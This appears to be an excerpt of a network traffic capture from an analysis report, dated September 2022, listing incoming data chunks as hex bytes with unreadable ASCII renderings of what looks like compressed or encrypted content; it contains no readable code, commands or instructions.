                                                                                                                                                            2022-09-29 12:45:22 UTC30538INData Raw: 5e 8a a6 2d 6f e3 09 00 fa ec 5b 0c da 38 22 7a b9 6b 22 66 bf 7e 71 ec e5 d6 32 ce c2 65 c8 85 73 d6 b5 58 e3 05 65 2a 16 cd 60 43 26 e7 b2 99 ec d3 ab 8f d7 6d d5 50 ee f0 fb e4 2b 52 f5 35 c9 14 be 2c 16 a1 06 84 2c bf 3d fb 9b e0 2e 12 8d 33 d4 6e 74 03 bd 49 88 a7 c4 69 2d 7c 61 17 01 91 d1 ab 55 a9 d7 3a e9 79 0e ae 3e 25 a2 56 ef ec a4 63 92 0c 0c 8d 9c 84 bb b0 43 a1 e1 00 83 74 85 71 a0 dc f6 33 80 62 77 6e 05 17 fd 94 c3 5e 77 1e 4a 18 48 f1 a6 54 2a e3 08 d9 55 30 46 3e b8 06 f5 b9 de 13 6a 5a e8 8d 0d 59 65 3e 4a c3 ee 3c 43 6e c6 f4 83 8d 9a 58 3b b8 73 5c f8 ac 22 f1 71 96 e4 94 67 64 da 89 01 4d 14 10 7d 34 94 33 a9 c9 34 16 78 93 d4 ad e2 5a 15 05 a0 94 25 2a 78 88 51 ac e3 6c 6d fa 68 88 cd 3e f6 14 ac 5d d9 a7 72 f6 9d cf 44 4c 3a f8 fa
                                                                                                                                                            Data Ascii: ^-o[8"zk"f~q2esXe*`C&mP+R5,,=.3ntIi-|aU:y>%VcCtq3bwn^wJHT*U0F>jZYe>J<CnX;s\"qgdM}434xZ%*xQlmh>]rDL:
                                                                                                                                                            2022-09-29 12:45:22 UTC30539INData Raw: dc 8f 92 c7 cc f4 e2 fe 05 ce db 28 bb 99 6b 64 3a 16 df d4 ca 94 aa 1d e8 0a 41 74 5b ad f6 02 43 6d ba 19 fb 61 07 9e 21 b2 3a c9 1a 9b e4 00 78 69 92 9f be 48 81 ff ce 43 84 b0 fb 6e 9f 52 df 99 31 35 f6 14 8d 1b 18 43 4a c4 01 11 6c 6b 49 b0 6f 28 e6 7a d5 45 26 6b d3 99 e5 65 e5 41 40 b8 7b d3 f3 f3 d5 d4 bc 93 18 81 7e fa d1 5a 29 13 5d eb db 75 63 d5 07 c2 15 04 15 e3 c1 3c fd cc cb f2 cd 28 7b 39 08 ce dd e4 73 d7 8e e7 c2 b1 3f 62 db ef 62 47 69 34 11 1e 68 5c 47 7b da c1 0c 5a 68 14 23 de be 93 57 18 62 0b 72 70 75 46 29 70 71 42 0e a6 b6 f1 79 91 fd 57 6a 89 71 26 a2 82 65 bb f7 38 9c 1b ed f2 c0 1b 10 58 56 0e 7a 9b 2c 72 0e 2d 77 3d aa 66 1d f3 c9 ff 3d e2 6b 0c 94 fb fc f2 89 64 5c 3c 10 7e 64 73 5d ac 93 cf a2 af 05 32 98 2b 2a 96 56 b7 2a
                                                                                                                                                            Data Ascii: (kd:At[Cma!:xiHCnR15CJlkIo(zE&keA@{~Z)]uc<({9s?bbGi4h\G{Zh#WbrpuF)pqByWjq&e8XVz,r-w=f=kd\<~ds]2+*V*
                                                                                                                                                            2022-09-29 12:45:22 UTC30540INData Raw: 01 32 d6 57 70 e3 e0 55 3d 3a 83 5b 22 0c 6c 1f 01 d4 53 70 89 a0 27 e8 0b 1d 37 29 0b 5b 0b 67 48 2e b4 98 64 49 fa 07 71 3a 40 40 00 4d 24 f5 d4 7d a7 6d e4 8f 7a 05 35 87 cc f7 b4 b0 40 cd e2 b9 81 60 96 49 2b 24 4d 7b 5a 35 5e 45 c7 d9 c2 b4 7c 24 69 79 ca 2e ca 8f 8b 44 23 c4 97 fe 70 86 57 30 e9 f8 10 a1 63 e1 e1 f0 2d ec b5 a8 ad 1c 82 6b b2 6b 59 48 87 91 3e 5f af d5 75 75 62 72 bf 84 68 59 9b 4e 6f 72 66 58 e1 5c a3 76 1b 1a 9e 13 6b fa 01 3d 26 cc bb b0 6e 21 07 50 5a b1 7e d4 6f d8 3f 53 18 b8 88 4f d4 8c 9f b4 7c 12 eb 51 00 c8 cd 73 e6 ea 77 fb 75 27 fd 02 24 26 e7 50 56 b1 80 9f 1f d3 72 bb 07 ae 98 c0 d1 06 99 43 4d bc 91 c0 aa cd 45 e9 80 31 23 0d c3 b5 c3 08 f3 13 86 46 91 55 b7 99 5c 29 41 2e 8f 9d 27 db 87 23 51 e2 cc b0 16 1e fe ed b5
                                                                                                                                                            Data Ascii: 2WpU=:["lSp'7)[gH.dIq:@@M$}mz5@`I+$M{Z5^E|$iy.D#pW0c-kkYH>_uubrhYNorfX\vk=&n!PZ~o?SO|Qswu'$&PVrCME1#FU\)A.'#Q
                                                                                                                                                            2022-09-29 12:45:22 UTC30556INData Raw: d9 1b c3 42 3e 4a 64 ca 93 06 47 60 b8 2b 61 b0 7f 7b b4 80 e7 32 28 20 2e b9 f3 66 6f 10 13 38 4c e0 9c ef 4f 8c e3 27 a8 61 1d 7f 25 82 67 8f 0f 5b 7e bf c0 8f 86 6d 34 89 8d 1c 5c c4 e5 83 6e d4 69 61 2e 29 d2 d9 c2 3d 81 b6 5c 15 7e 47 21 ed ea 70 a0 3c 3f 97 ac 4c d9 8d 23 73 d4 db 39 44 14 46 6e 1d b1 dc 0a 7d 73 b2 b9 15 34 e0 99 42 55 9a 09 75 75 17 f3 0f 57 b0 eb ad df da 26 af 6b 7a cc e4 b6 09 53 f9 28 d1 6c 55 31 08 98 86 f7 37 9e 6f 55 27 ca 8e ef 55 ef 7a b9 bc ce 9e 46 b6 09 86 62 bf 7f bc 41 8e b1 5e 4b de 0f 3f e5 06 ce e9 9a 3e 0c c4 9f 60 a7 ab 79 3f b5 81 9b 46 e9 e9 d2 e3 99 7c c3 21 ef ee b3 33 cf d6 ca de 50 49 c4 ea 3f d0 5e 9b 21 87 98 81 33 1f ae 82 25 b8 23 48 41 44 c2 28 e6 89 d7 fc 40 df f4 02 74 75 71 8d e9 3d fb 06 e5 9f 20
                                                                                                                                                            Data Ascii: B>JdG`+a{2( .fo8LO'a%g[~m4\nia.)=\~G!p<?L#s9DFn}s4BUuuW&kzS(lU17oU'UzFbA^K?>`y?F|!3PI?^!3%#HAD(@tuq=
                                                                                                                                                            2022-09-29 12:45:22 UTC30572INData Raw: de 7e 11 0a 15 70 a9 8a 0c 45 b3 55 4b 1c 6b 7f d0 47 23 23 20 ef 64 e5 b8 29 43 c9 1e 52 67 22 19 b5 ba a0 21 c2 39 f7 00 75 d3 9c b4 f0 ee 5e b3 0c 40 25 e9 d3 b1 49 9b 6c 90 6d f7 ef 8b 78 b2 93 1a 00 59 33 56 b8 40 1b c2 58 db 53 1f f1 a7 7f 2a f5 25 9b 6c b5 3a b4 58 93 09 5b 34 fa b4 ea e0 66 67 9c 65 ec 6c f6 a7 6b 0f 5d 0f d5 c0 34 f9 16 c6 74 63 d0 12 50 40 90 03 d9 55 6d 67 4f b5 d2 fc b2 4a 81 6a 89 ad 12 d0 64 cf f2 86 2a 27 ef e0 c7 d9 73 c4 79 4c 10 11 31 f8 a4 48 bc b3 8e 11 8f 86 af e7 8f e2 84 f9 b8 49 ca 6d 58 ee de 34 8c 47 9f 1b e2 b7 42 95 bc fc b5 6a fe b2 3f 18 86 96 39 be 7b 6a 79 2b a7 84 1f 29 42 72 d3 a7 30 f6 09 77 ba 64 dc e1 7c 86 6e bd 15 fe 0f 93 e2 89 7f 2d 36 81 97 60 3a f0 01 37 b8 dc c9 e5 8c fb e2 39 87 d8 64 83 e3 d7
                                                                                                                                                            Data Ascii: ~pEUKkG## d)CRg"!9u^@%IlmxY3V@XS*%l:X[4fgelk]4tcP@UmgOJjd*'syL1HImX4GBj?9{jy+)Br0wd|n-6`:79d
                                                                                                                                                            2022-09-29 12:45:22 UTC30588INData Raw: 50 bd cc 28 00 7b c0 c8 22 39 03 01 a0 06 8b f5 77 89 6b d8 42 e7 fd 65 08 c8 46 54 e0 57 91 77 1d 13 99 80 1c 7a f5 38 18 ba a1 f5 e5 a6 92 69 5c ed 1b 48 7b 31 fd 27 eb 33 36 bb 86 17 e1 8f 68 6f 53 3e df 39 d7 e9 1e f2 62 75 e1 07 74 b3 d2 32 d9 8d 1d df 71 bc fc e5 bb 0d 4c ab 1b 1b dd 40 48 27 f6 0d 04 bf 03 df f6 b7 c9 d8 fe 96 b7 f9 eb 48 8b a8 68 38 3b 5a 07 68 34 0f 65 d3 b6 77 d7 2d 7b e5 9c 69 1b 8d 44 ef ce 4b 6e f0 8c 7b c1 e8 d6 d0 7e 05 f8 d3 0b a7 c3 26 dd ba db ca 61 00 87 4f 3d ed c8 98 96 34 51 18 c4 8d 0f 0e 00 ea 63 8f b4 a6 dc 1c a3 1c 26 fa 55 c0 7b c7 e2 e7 eb 05 ce 36 07 af 84 c0 fa 00 d9 81 6c e4 59 9c f7 cc 43 e7 4d 16 31 a6 21 aa 72 04 b2 98 cc 62 67 65 3d cc 47 0b be 3b 4f 1a 41 6a 00 00 5c 69 a1 e3 b8 ba a5 c7 42 02 c6 b5 62
                                                                                                                                                            Data Ascii: P({"9wkBeFTWwz8i\H{1'36hoS>9but2qL@H'Hh8;Zh4ew-{iDKn{~&aO=4Qc&U{6lYCM1!rbge=G;OAj\iBb
                                                                                                                                                            2022-09-29 12:45:22 UTC30604INData Raw: f2 8c 00 dc ee 0a 6e 18 f3 63 20 e9 8b 8b 09 39 7b 40 61 a9 05 3e f0 11 79 df 58 33 d2 1f e6 8f b8 c5 d4 3c c1 1f 7a e7 a9 7e a4 a3 38 21 4f bd f0 3b ba 18 0c 93 5b b8 15 09 ff c9 66 5b 9b e6 7d e8 b2 7d ca 87 63 aa 89 50 b7 4f 9f ef 32 70 f3 4b 10 de c2 b1 97 39 81 b6 38 2a ab 17 62 6a 8f 70 8b 00 ec 75 c5 ba b8 da c6 49 05 d5 29 67 e6 da d7 84 1d 0c ea e0 7e 73 38 30 98 6f eb 6b e6 bf 37 1c 08 95 d5 30 91 a3 64 12 53 c6 1e 6c a4 50 6d 76 f0 66 6d 89 30 f9 da 4e f4 be 37 81 31 dc 14 6a 9f d1 e1 ee cb 13 73 ab 3e 08 fe f0 a6 0f f9 41 15 10 49 11 8b d6 68 f7 6e da 87 f3 5d d8 63 32 e8 85 77 9c c6 a9 39 3e a1 ba 38 1e cd 5f 22 ec 5c 64 e7 87 1e 5b de 6b 6d a8 d9 a2 52 05 b0 34 89 1a fe 7d 97 3c 8e c9 be ac 34 9a 4e dd ee ab 8c 59 61 61 ad 5a fc 70 7b 4d f1
                                                                                                                                                            Data Ascii: nc 9{@a>yX3<z~8!O;[f[}}cPO2pK98*bjpuI)g~s80ok70dSlPmvfm0N71js>AIhn]c2w9>8_"\d[kmR4}<4NYaaZp{M
                                                                                                                                                            2022-09-29 12:45:22 UTC30620INData Raw: 1e f4 0f 73 21 a0 98 ef 08 38 35 d7 02 35 95 90 17 52 1f 76 c4 48 52 74 02 a0 9b c6 ce 74 93 48 e8 0a d6 55 8c f4 39 a1 e5 68 2d f0 9c 29 38 60 f6 1a ed 8b f3 b2 b1 56 96 10 bb 68 17 6b 26 39 1a 7a 97 7c bb c1 e9 f1 cc f2 fb d1 00 8a 76 0d 98 66 55 ad bb e8 65 b6 a7 90 43 69 8a 57 d5 23 79 fe 36 a6 7f ea a7 ca 57 d3 ad 7c 1c 7c b7 8b f7 a6 ff 31 f2 4e ce 2d 15 1c de 57 55 12 bc c6 a6 71 c4 37 b8 2e 32 d5 3f b6 f9 1e 12 5c c4 28 23 d7 34 e1 92 4b 8e 33 ad 37 bb 79 00 a4 8c 4c 0f e2 11 c5 81 46 3f c5 41 b3 cf 65 96 86 6d fe 62 df 7c f7 dd 99 19 64 bb 28 36 96 d3 7a c2 17 9b e3 de 94 f9 1a 0d a2 22 30 17 c5 ad ca fb 7c fa 18 96 7f 5f 10 f4 f8 d2 56 33 0e 1b 7f 2c c0 5b 57 27 46 1b 9f 3c f5 db d3 02 55 5d 50 78 56 d9 21 b9 d5 da b7 6a dc e1 d6 94 3b f8 a4 c2
                                                                                                                                                            Data Ascii: s!855RvHRttHU9h-)8`Vhk&9z|vfUeCiW#y6W||1N-WUq7.2?\(#4K37yLF?Aemb|d(6z"0|_V3,[W'F<U]PxV!j;
                                                                                                                                                            2022-09-29 12:45:22 UTC30636INData Raw: 3c e0 20 8d eb 81 7b 6d f9 f3 61 25 6d 81 97 72 93 fb 9b b1 ab c1 5c cb ae 8b e6 76 09 c2 6e b5 bb 48 29 80 99 7f e5 58 ce 26 bc ba a9 be d6 69 49 f2 b7 b6 23 0d b4 be 10 3e 79 c5 2d 62 af 59 3c 16 a7 18 17 4d 6b af 56 44 2a e2 19 b6 0d 9a a9 f4 b0 a6 34 5e 6b 0e 50 fa b5 fe 4f 8e 49 f9 e0 4d 85 94 1a 87 67 76 66 da d1 91 c6 e3 86 b3 e0 f3 17 bb 0b f7 5b fd ae 92 2d 23 78 66 90 6d dc 26 67 8f 8d e4 ae 05 b5 b9 23 2c 4a 78 15 2e fd be 1c f6 87 88 8f cc 05 96 9f e5 2f a4 ed 57 f3 cb af 78 9d fa 3f 46 5d 25 bf ae 6d ec ed 00 de af 76 fb d7 7c 71 2d 29 77 01 12 50 09 86 bb 08 28 d4 86 83 96 6c 9d dd b9 81 e0 5a e7 d7 66 a1 fc 2f b5 97 72 19 e5 25 c6 29 f6 29 f5 0a b6 9c 44 7b 90 0e 41 e8 ea 1d fa ee 39 35 f7 d9 43 21 26 53 79 0d f2 cb cf a8 04 70 47 c6 92 c3
                                                                                                                                                            Data Ascii: < {ma%mr\vnH)X&iI#>y-bY<MkVD*4^kPOIMgvf[-#xfm&g#,Jx./Wx?F]%mv|q-)wP(lZf/r%))D{A95C!&SypG
                                                                                                                                                            2022-09-29 12:45:22 UTC30652INData Raw: b8 73 eb 07 fa 85 9a 73 7d 64 82 ff 4a 04 c3 65 88 3e fb 2c 9a 57 6c 01 4e 42 58 f0 e8 18 40 f9 22 f3 4e 29 21 c1 7a ed cc 8a ce ac 91 02 09 87 7c 57 10 11 42 41 92 19 f2 a2 9d 26 f5 25 d3 d4 13 4b b0 f4 8c 7a a7 45 34 08 5b 69 d0 64 63 89 e9 02 27 e7 04 8d b4 44 15 1e 96 d8 1c 79 5f 7b e8 8c 89 74 13 9e a6 4a cf 69 06 86 14 3f 80 25 01 e9 3c 2d 2f e7 60 b9 dc 28 bd 7c 17 7b 33 89 e8 c1 d0 0d e3 82 67 24 95 75 2b cc 04 73 fe 29 e0 1a 0f 3a b4 a3 2d df b6 c7 46 3f 73 79 f9 be d7 f8 04 42 48 d3 f1 1a 96 6c 66 7d 51 e5 49 d4 10 4b 1d af f3 e6 c5 85 39 27 9d 4c 74 c9 74 a4 ba 1a 8d 62 34 27 fc 52 71 2b 72 ff e4 69 d1 da 61 58 be a0 f1 bc 18 1b ad eb d9 6c e6 8b 43 12 c2 1b c9 83 10 b0 a1 f8 ef cd 26 12 14 06 84 07 9e d3 b7 96 40 ed 41 18 78 c0 20 58 c1 c7 e0
                                                                                                                                                            Data Ascii: ss}dJe>,WlNBX@"N)!z|WBA&%KzE4[idc'Dy_{tJi?%<-/`(|{3g$u+s):-F?syBHlf}QIK9'Lttb4'Rq+riaXlC&@Ax X
                                                                                                                                                            2022-09-29 12:45:22 UTC30668INData Raw: 96 d0 88 a4 e2 e9 f0 76 1d d3 12 e1 4e f9 18 74 a7 2c 5c 0d b8 7c e1 77 81 62 06 14 5f bb 6b 95 3c 53 77 05 2d c0 fb b8 81 5b 8a bf e0 16 ec cb 83 d2 b5 7d 29 12 ea 5b 99 79 a7 7a 6d 95 39 77 4b fb b8 8e b4 b7 f2 30 d6 5a 48 ab 36 57 43 23 f8 7b fd 4d 0b 5d a1 a3 70 0e 3c 1a c4 92 fe 80 22 68 dc 5c b0 6d fe 54 65 68 72 76 94 6a 1d af c7 33 e4 e5 63 d6 7b e0 f1 48 19 d2 93 59 84 f5 cc bb 4c 8c 02 04 1f 72 3e 37 1f 14 2e ec 1a 13 1a 82 32 d8 78 62 a0 bc 7f 67 22 e3 a9 34 df 35 a3 ac 42 39 74 5c 52 51 fe 91 7c 52 24 72 a4 a1 be 0e 21 44 c9 2c 2d b0 3c 14 cb 72 8d 77 f8 4c 07 01 a7 bd ec 33 c5 bb 50 9a 08 2c 92 45 8a 8f 61 12 30 3c 2c 30 c4 f5 25 19 ea eb 66 1f f4 5b b3 4b 57 b3 cf d8 6a 7c 2b 2d 0e c2 5c 4e 58 ef cc 33 3f dd 9b 1b 91 7a a9 b3 c7 1a 6c b8 8e
                                                                                                                                                            Data Ascii: vNt,\|wb_k<Sw-[})[yzm9wK0ZH6WC#{M]p<"h\mTehrvj3c{HYLr>7.2xbg"45B9t\RQ|R$r!D,-<rwL3P,Ea0<,0%f[KWj|+-\NX3?zl
                                                                                                                                                            2022-09-29 12:45:22 UTC30684INData Raw: 81 28 93 67 02 ef f2 84 b6 b1 ef 7d 9e 81 e4 8f 64 02 fb 18 26 06 cf 59 09 27 e2 f8 6a 81 45 0f 26 65 ea 6c be 23 87 ed 9a a9 da 85 30 28 ac b3 5a 23 11 fe 57 39 20 75 73 43 5b bf 3b a8 77 cd f7 ca fa 7f 26 2a 9a dc 5e b4 84 84 b1 64 8f 61 29 a4 d2 1d 65 00 0e 68 7f e3 e6 77 90 92 f5 a4 40 8f 50 83 9b 05 04 dc 0f a9 62 33 4c 03 87 a4 77 c8 8b c8 ef 60 0e d2 eb 35 a4 80 e6 f1 5b 38 77 b1 79 87 34 99 71 b5 bf a6 25 9e 3c 36 09 6b 02 b6 54 0e 15 78 b5 01 e2 f4 4f cd 22 0b 8e 41 89 73 eb 36 e2 ef cf 36 77 e0 da 7a 97 2b 3b 3e 58 79 6f 1d fa 9b 8c 9a 36 f5 be 92 f9 4c 68 e3 44 dd 23 90 fc b2 38 73 27 96 ef cf 01 cf ad c2 f2 bf 57 b2 bb bb 0c 56 01 c4 2e 57 41 6c ac 91 40 8d 9e 15 2a f0 ac bd 2a b5 ca a3 8c 5d 88 60 a5 8f 98 18 fe 2d 31 75 28 c1 b8 3a 83 6e 82
                                                                                                                                                            Data Ascii: (g}d&Y'jE&el#0(Z#W9 usC[;w&*^da)ehw@Pb3Lw`5[8wy4q%<6kTxO"As66wz+;>Xyo6LhD#8s'WV.WAl@**]`-1u(:n
                                                                                                                                                            2022-09-29 12:45:22 UTC30700INData Raw: 1b 4f 17 36 fd cc 63 1f 80 9f 4a 1d d1 26 2a fd b2 2b 79 21 4d 0c a4 cf ff ed d1 da 03 eb ba f0 6f f0 16 b9 6c 59 f4 a6 8c 9c 3c dc a5 8a fb 8f 1a 15 96 39 fe fc 97 db b5 d9 07 04 21 08 69 e9 53 08 32 07 a7 de ed 0f ba 46 62 34 55 43 c7 21 c3 74 9d 18 46 9b 4b b0 a9 8b 3e 3f 20 ca c8 af f9 48 02 d4 57 e6 19 8d 71 af 2e 74 4c 3a a7 e9 a8 17 42 51 97 80 9b f2 d2 87 2b 21 65 f9 a5 6b c4 7b ec 1e d3 b7 6b d9 57 32 73 0d 92 35 f9 eb 56 ca 1b 00 af 5b 78 13 13 b1 c0 37 94 46 67 57 73 d8 ca 75 e8 fa 23 3e d1 36 39 9b b7 d2 ae fc a2 e3 54 8f d1 18 7b d7 00 9b 7a f4 1a d9 ed 31 61 ba 5c 3d 7f 12 12 65 20 3a 5a f3 44 1b d9 a9 19 2e 73 0e d7 06 0e 91 aa 4d 56 18 3b fe c1 cb e3 2b 77 1f 97 37 ae 1d 7a 2b 3a fa 05 d4 a0 45 a3 b6 e7 5e be 96 14 9e 9b dc 08 8c 70 d0 f7
                                                                                                                                                            Data Ascii: O6cJ&*+y!MolY<9!iS2Fb4UC!tFK>? HWq.tL:BQ+!ek{kW2s5V[x7FgWsu#>69T{z1a\=e :ZD.sMV;+w7z+:E^p
                                                                                                                                                            2022-09-29 12:45:22 UTC30716INData Raw: 32 51 30 5a 18 84 66 7b 43 ab 42 47 04 70 ae df c7 b5 57 11 05 1c d9 f7 16 16 b6 ca 1e 78 46 44 67 73 78 2a 04 10 08 2e 38 b2 50 b5 bb d7 30 5f bd 0a 3c 74 1e 63 cb 6b 51 92 75 be 83 3f a6 f9 cc db d1 6a 20 14 0e b4 96 c7 7c c7 ff 99 6d d2 2a 63 1a 79 64 17 a2 ba 28 79 f2 23 3f 04 20 5c ac 6e eb d0 e2 5f 55 48 ec e8 58 45 ad 36 dc 82 84 4a 8e 72 b8 79 c7 57 2c c0 1f 8f 62 c2 9c 69 af 4b be 9e f3 e2 87 78 03 6e 62 3e ef 2b 55 57 79 7d c9 58 12 fb 6c bf b9 52 30 72 04 2f 0c 07 79 90 fd 06 bd b8 cd 97 a7 e6 1e b2 07 23 e3 77 36 0d 98 4d 6d 8b c5 65 c2 59 56 b1 08 4a cb 0c 17 9e 87 15 47 34 bc b2 62 82 33 36 ee b6 7f a1 c9 56 e0 d5 37 14 eb f0 79 06 77 70 03 fd ad 4b d1 4a 48 e9 d2 ad a6 59 90 ae 1e 01 fc 76 a9 b0 eb 46 e9 d2 1a a5 da e5 b7 d3 34 cd e5 fe ce
                                                                                                                                                            Data Ascii: 2Q0Zf{CBGpWxFDgsx*.8P0_<tckQu?j |m*cyd(y#? \n_UHXE6JryW,biKxnb>+UWy}XlR0r/y#w6MmeYVJG4b36V7ywpKJHYvF4
                                                                                                                                                            2022-09-29 12:45:22 UTC30732INData Raw: ac a1 a2 bd 6f 4d 16 fb 93 9f 3e d3 06 64 c5 2b 1a a4 fd 2a 1b fd f1 82 ed 87 2c 5e 8d d1 58 94 7d 13 4c e7 ff 91 e5 17 f8 79 48 0f 1a 18 fc 0f 52 a9 c4 e8 05 a6 19 73 81 83 09 51 b7 e7 8f 5a e2 39 58 32 bf c1 d1 61 8f 95 47 42 14 f3 3f 80 34 8e 2b 73 5f 3d 79 20 95 2d 75 ce d6 01 48 1e 24 50 b9 bc 59 77 10 a1 f0 bd 18 3f 64 6e 77 73 b5 45 8e 26 b9 62 9f a7 98 7e af 32 de c0 83 fa f0 37 9a d6 10 54 2f 80 f6 01 80 2e ff 2d 20 81 14 db b4 fc 71 5a c2 d8 ce cc 09 14 f6 e6 ce ef b1 36 85 73 7d 0d 9f ab fa 32 0a bb f3 45 80 b5 81 98 0d 0b 6e e1 13 84 ac 81 e3 12 e3 46 4b 44 b6 5b 78 f1 60 ea 2f e6 56 e5 46 ec fe 75 32 9d 18 1c d3 be 37 40 d4 94 83 5d 1f 68 5b bf 5f aa e1 82 83 10 cb 41 7b 5a 60 d7 20 49 54 dc 2b 90 d7 1a 3e 84 e2 a2 e8 51 b9 44 6a 28 02 f4 5e
                                                                                                                                                            Data Ascii: oM>d+*,^X}LyHRsQZ9X2aGB?4+s_=y -uH$PYw?dnwsE&b~27T/.- qZ6s}2EnFKD[x`/VFu27@]h[_A{Z` IT+>QDj(^
                                                                                                                                                            2022-09-29 12:45:22 UTC30748INData Raw: 7b 3b f7 34 ff d5 1d fd cf a5 99 f8 f4 00 36 ec 57 b3 c4 85 7f f5 0b f6 7f f3 d3 ea 59 b2 99 ec 3c ff 03 a2 ad fe ef aa a1 d2 39 6c 5a 38 76 83 d0 68 03 fd 2d 74 77 54 79 f0 e4 e9 9e b6 77 d2 4b 0b 54 39 17 42 f7 da bc 96 94 c3 d6 20 c4 f6 7f 20 86 1f 02 d5 35 d3 3f 94 e5 bd 0a cb 10 cd 3e 56 59 30 7d de b4 c8 f4 08 44 0b 56 77 da 48 fa 52 19 26 c4 de 27 a4 30 a8 0e 89 7b 27 7c 89 47 50 40 b7 38 0f 37 58 96 29 84 22 f9 32 d3 85 d7 1f 16 1d a9 22 52 ed 76 1c 3b 19 88 ef 24 42 f6 3a 3d 25 fd 7f 55 98 38 b1 62 68 dc bf d2 ac 0d 10 53 7f 77 bc e9 e4 ff 1e 53 99 88 00 51 dd 72 f0 8d ee fd 9e ef 7b cb fd 18 7f 60 7d e6 c0 17 e7 5f 48 42 ee 76 0c 24 29 e5 81 14 00 18 62 c4 8e be 0c 47 46 ca 50 c0 b7 2c bf 2b 04 34 45 57 f6 c9 91 0d 05 0f 8a d4 c8 d6 ec ba 08 36
                                                                                                                                                            Data Ascii: {;46WY<9lZ8vh-twTywKT9B 5?>VY0}DVwHR&'0{'|GP@87X)"2"Rv;$B:=%U8bhSwSQr{`}_HBv$)bGFP,+4EW6
                                                                                                                                                            2022-09-29 12:45:22 UTC30764INData Raw: 77 e4 c2 ef 2b d9 e2 cc 19 d5 68 80 f5 3e 40 a7 13 dd 7f cc e8 ac c9 6d f6 1f aa b1 fb 12 fe 50 59 47 4a 49 48 59 ac 7f 75 92 d1 0b b2 b4 b6 d2 bb 30 f0 7f 32 3c 37 c1 c9 2b 17 95 e3 6c 4e 57 03 d2 34 bc 25 19 3b 0f 46 7b 88 8d d2 51 b5 02 0a ee a7 79 b4 f8 03 e0 53 87 2f ab d9 98 39 cb 93 73 a6 1f d7 41 a4 e8 07 6a 95 9b c7 4d ed 0b 55 31 cc 9c c2 21 ed 3d d4 6e 04 f5 94 e3 dc dd 77 9b 0e 0f f0 b1 b7 8c 43 dc 23 7d 42 83 59 64 8a 57 e8 db 38 e3 32 ac 96 c8 2f f8 06 96 d2 32 a2 67 e0 ad 64 8a ea 9f 2a 17 03 cd 87 f8 cc ff a2 a3 34 5f fb 25 2c 0e b3 65 a1 d8 f1 04 76 25 5b f9 97 a5 2f 0c 51 7c e9 07 91 cb c3 ce 30 4e 22 77 94 c5 35 4f 2c 69 86 b3 55 a0 27 46 4d a5 47 6b 30 e1 b8 c4 bb 99 07 81 23 c6 24 84 70 18 84 85 d3 8c fd 06 c9 94 6d 95 de ad 59 c0 33
                                                                                                                                                            Data Ascii: w+h>@mPYGJIHYu02<7+lNW4%;F{QyS/9sAjMU1!=nwC#}BYdW82/2gd*4_%,ev%[/Q|0N"w5O,iU'FMGk0#$pmY3
                                                                                                                                                            2022-09-29 12:45:22 UTC30780INData Raw: 61 46 99 b2 3d 21 0f 15 6e 39 a5 6a 98 24 4c 8e a5 14 8e 1b db 92 e2 70 2f 22 1e 10 4c b6 b3 2e 48 96 6b db df 57 0a db bc 2a ef 0e 74 2b e7 8a 3b cd 58 27 d0 97 e5 c5 72 39 a0 f4 20 a6 59 be 3c 9c 55 eb 28 17 9a f8 a2 7d 21 17 56 de 8a e6 05 1a f6 17 42 e3 f7 21 c4 5f d8 24 43 77 3a b4 1a 0b 79 e7 4c f2 85 3a 45 f0 6a 87 c8 d3 25 47 0c 7c 4c 01 d0 1b 37 98 b6 24 33 25 c4 7b ce 6a 08 12 b1 fe 2a a1 5c 7d d3 d7 fb ea f9 e3 9c 6b 01 78 5b 81 00 a5 af 6f f5 27 20 f6 26 fe 49 e9 53 37 6c 21 f0 63 32 7c e7 ef 54 b7 6a a4 77 df 65 36 33 6d ea 7c 1f b0 a1 43 35 7e 20 22 c9 0a da e0 76 ae ac 36 ce 8c c0 6d 4f 43 8f 5a d4 83 ae b1 08 15 ea a1 6d 4d 26 cc 14 e4 ec 42 2f 41 b5 19 08 57 dd 1f f0 c0 29 65 56 0e 44 ec c3 ff 8d 0a b2 4a cd d8 a2 8d 3c 35 36 7e 93 d8 55
                                                                                                                                                            Data Ascii: aF=!n9j$Lp/"L.HkW*t+;X'r9 Y<U(}!VB!_$Cw:yL:Ej%G|L7$3%{j*\}kx[o' &IS7l!c2|Tjwe63m|C5~ "v6mOCZmM&B/AW)eVDJ<56~U
                                                                                                                                                            2022-09-29 12:45:22 UTC30796INData Raw: 39 91 b7 26 ad 8e 32 14 ca 08 95 44 32 9d e6 21 03 d5 17 d2 72 18 a8 4d 8d bf 4b 39 0b a3 12 bb 5a 2d f2 24 4a 60 ca 12 e1 54 a3 49 3e bf a3 e2 74 f8 a0 30 99 6d b8 17 90 33 1f de 92 22 00 bf 46 26 0b f9 4d 54 6a cf 25 a0 4a ac b6 53 d3 54 67 9c f3 13 89 0a 50 9e 49 60 d0 e4 73 26 a0 91 23 6d 9f 12 e1 e2 ef bc d8 de fc 5e ee cc fc 75 91 0d 1e a8 92 7e 7f 60 90 02 bb 43 6b 23 c2 cd bf 69 2e 47 86 e4 28 53 0e 7c ce 32 ed bc 4e f0 0b b9 da 62 45 5c 14 1a 12 84 19 37 da f5 7d d2 48 58 ef a2 2b d8 14 a2 a2 91 f5 86 f1 44 a6 e8 6a 7f 87 27 6b 45 45 e7 82 5d fc f9 8c f9 33 d2 82 87 2e 40 15 15 fe 65 82 8a dd 9c 33 b8 83 5a 83 71 89 2e 27 9a b6 16 a2 f3 54 03 dd ef ca 85 cb 0d db 63 b3 22 e1 8e b8 68 4f 01 92 37 62 e9 e1 23 80 3a 7d 72 9c 11 a4 87 6e 91 57 88 f3
                                                                                                                                                            Data Ascii: 9&2D2!rMK9Z-$J`TI>t0m3"F&MTj%JSTgPI`s&#m^u~`Ck#i.G(S|2NbE\7}HX+Dj'kEE]3.@e3Zq.'Tc"hO7b#:}rnW
